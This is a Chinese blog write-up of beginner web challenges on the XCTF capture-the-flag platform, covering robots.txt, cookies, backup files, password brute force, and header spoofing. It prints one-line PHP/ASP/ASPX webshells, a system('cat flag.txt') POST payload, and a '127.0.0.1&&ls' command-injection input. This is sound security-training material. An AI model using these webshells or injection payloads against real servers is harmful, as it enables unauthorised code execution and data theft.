其他分享
首页 > 其他分享> > 攻防世界Web新手区题解

攻防世界Web新手区题解

作者:互联网


攻防世界Web新手区题解

本周开始做攻防世界web新手区的内容。

一、View_source

题目描述:X老师让小宁同学查看一个网页的源代码,但小宁同学发现鼠标右键好像不管用了。

在这里插入图片描述
F12:
在这里插入图片描述
即可获得flag。当然也可以在地址栏前面加上view-source

二、Robots

题目描述:X老师上课讲了Robots协议,小宁同学却上课打了瞌睡,赶紧来教教小宁Robots协议是什么吧。

robots 是网站跟爬虫间的协议,用简单直接的 txt 格式文本方式告诉对应的爬 虫被允许的权限,也就是说 robots.txt 是搜索引擎中访问网站的时候要查看的 第一个文件。当一个搜索蜘蛛访问一个站点时,它会首先检查该站点根目录下是 否存在 robots.txt,如果存在,搜索机器人就会按照该文件中的内容来确定访 问的范围;如果该文件不存在,所有的搜索蜘蛛将能够访问网站上所有没有被口 令保护的页面。

先看一下robots.txt文件,看看有什么东西:

在这里插入图片描述
提示我们打开flag_ls_h3re.php文件:
在这里插入图片描述
获得flag

三、Get_post

题目描述:X老师告诉小宁同学HTTP通常使用两种请求方法,你知道是哪两种吗?

在 url 中输入?a=1 get 方式传递一个 a 值 再用火狐的 Hackbar 以 post 的方式传递 b 的值:
在这里插入图片描述

四、Cookie

题目描述:X老师告诉小宁他在cookie里放了些东西,小宁疑惑地想:‘这是夹心饼干的意思吗?’

用火狐浏览器查看 cookie,得到提示,查看 http 响应头,得到 flag

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

五、Backup

题目描述:X老师忘记删除备份文件,他派小宁同学去把备份文件找出来,一起来帮小宁同学吧!

在这里插入图片描述
index.php的备份文件文件名:index.php.bak

访问index.php.bak得到一个文件夹,用记事本打开:
在这里插入图片描述

六、Disabled_button

题目描述:X老师今天上课讲了前端知识,然后给了大家一个不能按的按钮,小宁惊奇地发现这个按钮按不下去,到底怎么才能按下去呢?

查看元素发现 button 的默认值是 disabled,删了就能按了
在这里插入图片描述
在这里插入图片描述

七、simple_php

题目描述:小宁听说php是最好的语言,于是她简单学习之后写了几行php代码。

打开页面发现是以get的方式传入参数a和b,并且要求a=0&&a为真,b不能为数字且b>1234 通过构造命令 a=a&&b=12345a:

在这里插入图片描述

八、weak_auth

题目描述:小宁写了一个登陆验证页面,随手就设了一个密码。

随便输入用户名和密码,提示要用 admin 用户登入,然后就跳转到了 check.php,查看源码, 提示要用字典,
在这里插入图片描述
用 admin 和 123 登陆,再用 burp 截下数据包并发送到 intruder 爆破
在这里插入图片描述
加载字典后,

在这里插入图片描述
明显看到当密码为 123456 时的响应包长度不一致,点进去得到 flag

在这里插入图片描述
在这里插入图片描述

九、xff_referer

题目描述:X老师告诉小宁其实xff和referer是可以伪造的。

打开页面要求 ip 为 123.123.123.123,可以使用 X-Forwarder-For 来伪造 ip

在这里插入图片描述

进入 Repeater 选项卡,添加 xff 头

在这里插入图片描述
看到要必须来自 google.com,利用 referer 添加

在这里插入图片描述
在这里插入图片描述

十、webshell

题目描述:小宁百度了php一句话,觉着很有意思,并且把它放在index.php里。
在这里插入图片描述
打开页面有一句话,可以看出密码是 shell,可以用菜刀和蚁剑,这里用 hackbar

一句话木马就是通过向服务端提交一句简短的代码来达到向服务器插入木马并 最终获得 webshell 的方法。
php 一句话木马: <?php @eval($_POST[value]); ?>
asp 一句话木马: <%eval request (“value”)%> 或 <% execute(request(“value”)) %>
aspx 一句话木马: <%@ Page Language=“Jscript” %> <% eval(Request.Item[“value”]) %>
使用 post 传递 shell=system(‘cat flag.txt’);

在这里插入图片描述

十一、simple_js

题目描述:小宁发现了一个网页,但却一直输不对密码。(Flag格式为 Cyberpeace{xxxxxxxxx} )
在这里插入图片描述
打开页面让我们输入密码,随便输一个后,查看源代码:

在这里插入图片描述
看到一串字符用 python 输出:假的密码 hh

在这里插入图片描述
在这里插入图片描述
又发现一串 16 进制字符,用 python 转换为 10 进制在转化成对应的 ascii 码:
在这里插入图片描述
在这里插入图片描述

十二、command_execution

题目描述:小宁写了个ping功能,但没有写waf,X老师告诉她这是非常危险的,你知道为什么吗。

在这里插入图片描述
ping 一下 127.0.0.1 可以执行再尝试拼接执行,ping 127.0.0.1&&ls 也可以执行,

在这里插入图片描述
尝试找到所有的 txt 文件,发现 flag.txt,打开
在这里插入图片描述

标签:攻防,txt,题目,Web,题解,小宁,flag,php,描述
来源: https://blog.csdn.net/weixin_44522540/article/details/109406930